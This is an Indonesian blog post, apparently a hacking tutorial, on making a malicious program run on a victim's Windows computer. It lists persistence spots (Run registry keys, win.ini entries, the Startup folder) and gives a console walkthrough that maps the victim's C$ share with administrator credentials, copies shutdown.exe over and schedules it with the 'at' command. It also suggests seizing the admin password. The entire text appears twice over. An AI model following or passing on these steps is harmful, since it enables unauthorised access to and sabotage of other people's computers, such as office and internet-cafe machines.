1001 cara menuju cina. mungkin itulah kata yang tepat untuk menggambarkan tutorial kali ini. Pernahkah anda berpikir untuk menjalankan program yang anda buat untuk dijalankan secara remote di komputer lain. Misalnya anda membuat program shutdown.exe untuk kepentingan shutdown PC kantor, warnet atau bahkan komputer korban yang ingin anda jahili, tidak perlu berlama lama langsung saja kita jalankan jurusnya.
Mengcopykan file jahat ke komputer korban memanglah mudah. Tapi untuk menjalankan program tersebut adalah masalah yang berbeda. Seandainya program telah berhasil anda copykan ke komputer korban, maka bila ingin menjalankannya seorang hacker tidak bisa langsung menklik program tersebut. Karena bila mengkliknya, otomatis komputer lah yang menjalankan program tersebut, Kata bang Mamat waktu smp “ibarat senjata makan tuan” tentunya anda tidak ingin seperti ini bukan. Lalu bagaimana menjalankan program pada computer remote ?. Ada beberapa cara yang bisa dilakukan, dan hal ini memiliki spesifikasi tertentu pula pada system operasi yang digunakan oleh korban.
1. Melakukan perubahan pada Registry.
Untuk melakukan perubahan registry secara remote, Hacker terlebih dahulu harus mendapatkan Hak penuh Administrator computer korban. Banyak software untuk mendapatkan password Administrator salah satunya John the ripper yang tidak akan di bahas disini. Cara lainnya dengan mengetikkan Command pada menu Run Lusrmgr.msc dan rubahlah pass admin dengan pass baru anda (yang saya herankan disini Microsoft tidak meminta password lama untuk mengganti password baru). Haha..
Dan inilah dia lokasi penyimpanannya :
My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunonceEx
2. Memanipulasi file win.ini dan system.ini
Cara ini hanya berlaku pada sistem operasi Windows 9x dan Me. Sedangkan untuk XP dan 2003 sudah tidak menggunakan file ini lagi. Berikut contoh entry untuk dimasukkan dalam file win.ini dan system.ini :
Win.ini
Run=C:\WINDOWS\SYSTEM\shutdown.exe
Load=System.ini
[boot]
Shell=Explorer.exe
C:\WINDOWS\SYSTEM\shutdown.exe
3. Menyimpan program pada Direktori startup.
Directory startup adalah dir khusus pada windows untuk menjalankan program secara otomatis ketika computer dihidupkan. Bisa anda lihat pada menu START?PROGRAMS ?STARTUP. Lokasi penyimpanan file startup bisa anda lihat di : C:\Documents and S e t t i n g s \ % n a m a u s e r % \ S t a r t Menu\Programs\Startup (NT, 2000, XP) C:\WINDOWS\Start Menu\Programs\Startup (9x, Me)
4. Scheduling dengan perintah AT
Ini merupakan teknik yang paling efisien menurut saya, karena Hacker tidak perlu menunggu computer korban untuk melakukan startup. Berikut saya perlihatkan beberapa contoh penggunaan cara ini, yang akan membuat computer korban yang diremote bertekuk lutut dihadapan anda. Hal pertama yang saya lakukan adalah melakukan Mapping drive c: dari computer korban (192.168.100.20 ) menjadi drive x: pada computer saya. Terlihat bahwa account yang digunakan adalah Administrator dengan password “passwordnyaapa”. Setelah koneksi diterima, saya memberikan perintah copy shutdown.exe x: yang bertujuan mengcopykan file shutdown.exe ke computer korban. (dengan asumsi drive x saya adalah drive c: computer korban) Kemudian disini saya melakukan penyesuaian waktu / jam computer korban dengan command net time \\192.168.100.20 . terlihat waktu pada computer korban menunjukan pukul 7:37 AM. Langkah akhir yang paling menentukan keberhasilan ini adalah perintah scheduling yang tepat. Terlihat waktu yang ditunjukan pada computer korban pukul 7:37 AM , maka saya memberikan perintah scheduling dengan command at \\192.168.100.20 7:40A “c:\shutdown.exe” untuk menjalankan program shutdown.exe pada pukul 7:40 AM , tepatnya 3 menit berikutnya. Anda dapat menentukan waktu yang berbeda sesuai dengan waktu yang ingin anda tetapkan. Untuk melihat dan memastikan bahwa serangan anda berhasil, silahkan melakukan ping atau cek scheduling yang telah anda buat tadi dengan menggunakan command at \\192.168.100.20. Tugas anda telah selesai, silahkan duduk dan buatlah secangkir kopi untuk menunggu waktu kemenangan anda....
Microsoft Windows XP [Version
5.1.2600] (C) Copyright 1985-2001
Microsoft Corp.
C:\Documents and Settings\User>CD\
C:\>net use x: \\192.168.100.20\c$
/user:administrator passwordnyaapa
The command completed successfully.
C:\>copy shutdown.exe x:
1 file (s) copied.
C:\>net time \\192.168.100.20
Current time at \\192.168.100.20 is
2/21/2008 7:37 AM
The command completed successfully.
C:\>at \\192.168.100.20 7:40A
“c:\shutdown.exe”
Added a new job with job ID = 1
C:\>at \\192.168.100.20
StatusID Day Time Command Line
-------------------------------------
1 Today,7:40 AM c:\shutdown.exe
C:\>at \\192.168.100.20
There are no entries in the list.
Mengcopykan file jahat ke komputer korban memanglah mudah. Tapi untuk menjalankan program tersebut adalah masalah yang berbeda. Seandainya program telah berhasil anda copykan ke komputer korban, maka bila ingin menjalankannya seorang hacker tidak bisa langsung menklik program tersebut. Karena bila mengkliknya, otomatis komputer lah yang menjalankan program tersebut, Kata bang Mamat waktu smp “ibarat senjata makan tuan” tentunya anda tidak ingin seperti ini bukan. Lalu bagaimana menjalankan program pada computer remote ?. Ada beberapa cara yang bisa dilakukan, dan hal ini memiliki spesifikasi tertentu pula pada system operasi yang digunakan oleh korban.
1. Melakukan perubahan pada Registry.
Untuk melakukan perubahan registry secara remote, Hacker terlebih dahulu harus mendapatkan Hak penuh Administrator computer korban. Banyak software untuk mendapatkan password Administrator salah satunya John the ripper yang tidak akan di bahas disini. Cara lainnya dengan mengetikkan Command pada menu Run Lusrmgr.msc dan rubahlah pass admin dengan pass baru anda (yang saya herankan disini Microsoft tidak meminta password lama untuk mengganti password baru). Haha..
Dan inilah dia lokasi penyimpanannya :
My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
My Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunonceEx
2. Memanipulasi file win.ini dan system.ini
Cara ini hanya berlaku pada sistem operasi Windows 9x dan Me. Sedangkan untuk XP dan 2003 sudah tidak menggunakan file ini lagi. Berikut contoh entry untuk dimasukkan dalam file win.ini dan system.ini :
Win.ini
Run=C:\WINDOWS\SYSTEM\shutdown.exe
Load=System.ini
[boot]
Shell=Explorer.exe
C:\WINDOWS\SYSTEM\shutdown.exe
3. Menyimpan program pada Direktori startup.
Directory startup adalah dir khusus pada windows untuk menjalankan program secara otomatis ketika computer dihidupkan. Bisa anda lihat pada menu START?PROGRAMS ?STARTUP. Lokasi penyimpanan file startup bisa anda lihat di : C:\Documents and S e t t i n g s \ % n a m a u s e r % \ S t a r t Menu\Programs\Startup (NT, 2000, XP) C:\WINDOWS\Start Menu\Programs\Startup (9x, Me)
4. Scheduling dengan perintah AT
Ini merupakan teknik yang paling efisien menurut saya, karena Hacker tidak perlu menunggu computer korban untuk melakukan startup. Berikut saya perlihatkan beberapa contoh penggunaan cara ini, yang akan membuat computer korban yang diremote bertekuk lutut dihadapan anda. Hal pertama yang saya lakukan adalah melakukan Mapping drive c: dari computer korban (192.168.100.20 ) menjadi drive x: pada computer saya. Terlihat bahwa account yang digunakan adalah Administrator dengan password “passwordnyaapa”. Setelah koneksi diterima, saya memberikan perintah copy shutdown.exe x: yang bertujuan mengcopykan file shutdown.exe ke computer korban. (dengan asumsi drive x saya adalah drive c: computer korban) Kemudian disini saya melakukan penyesuaian waktu / jam computer korban dengan command net time \\192.168.100.20 . terlihat waktu pada computer korban menunjukan pukul 7:37 AM. Langkah akhir yang paling menentukan keberhasilan ini adalah perintah scheduling yang tepat. Terlihat waktu yang ditunjukan pada computer korban pukul 7:37 AM , maka saya memberikan perintah scheduling dengan command at \\192.168.100.20 7:40A “c:\shutdown.exe” untuk menjalankan program shutdown.exe pada pukul 7:40 AM , tepatnya 3 menit berikutnya. Anda dapat menentukan waktu yang berbeda sesuai dengan waktu yang ingin anda tetapkan. Untuk melihat dan memastikan bahwa serangan anda berhasil, silahkan melakukan ping atau cek scheduling yang telah anda buat tadi dengan menggunakan command at \\192.168.100.20. Tugas anda telah selesai, silahkan duduk dan buatlah secangkir kopi untuk menunggu waktu kemenangan anda....
Microsoft Windows XP [Version
5.1.2600] (C) Copyright 1985-2001
Microsoft Corp.
C:\Documents and Settings\User>CD\
C:\>net use x: \\192.168.100.20\c$
/user:administrator passwordnyaapa
The command completed successfully.
C:\>copy shutdown.exe x:
1 file (s) copied.
C:\>net time \\192.168.100.20
Current time at \\192.168.100.20 is
2/21/2008 7:37 AM
The command completed successfully.
C:\>at \\192.168.100.20 7:40A
“c:\shutdown.exe”
Added a new job with job ID = 1
C:\>at \\192.168.100.20
StatusID Day Time Command Line
-------------------------------------
1 Today,7:40 AM c:\shutdown.exe
C:\>at \\192.168.100.20
There are no entries in the list.
0 komentar:
Posting Komentar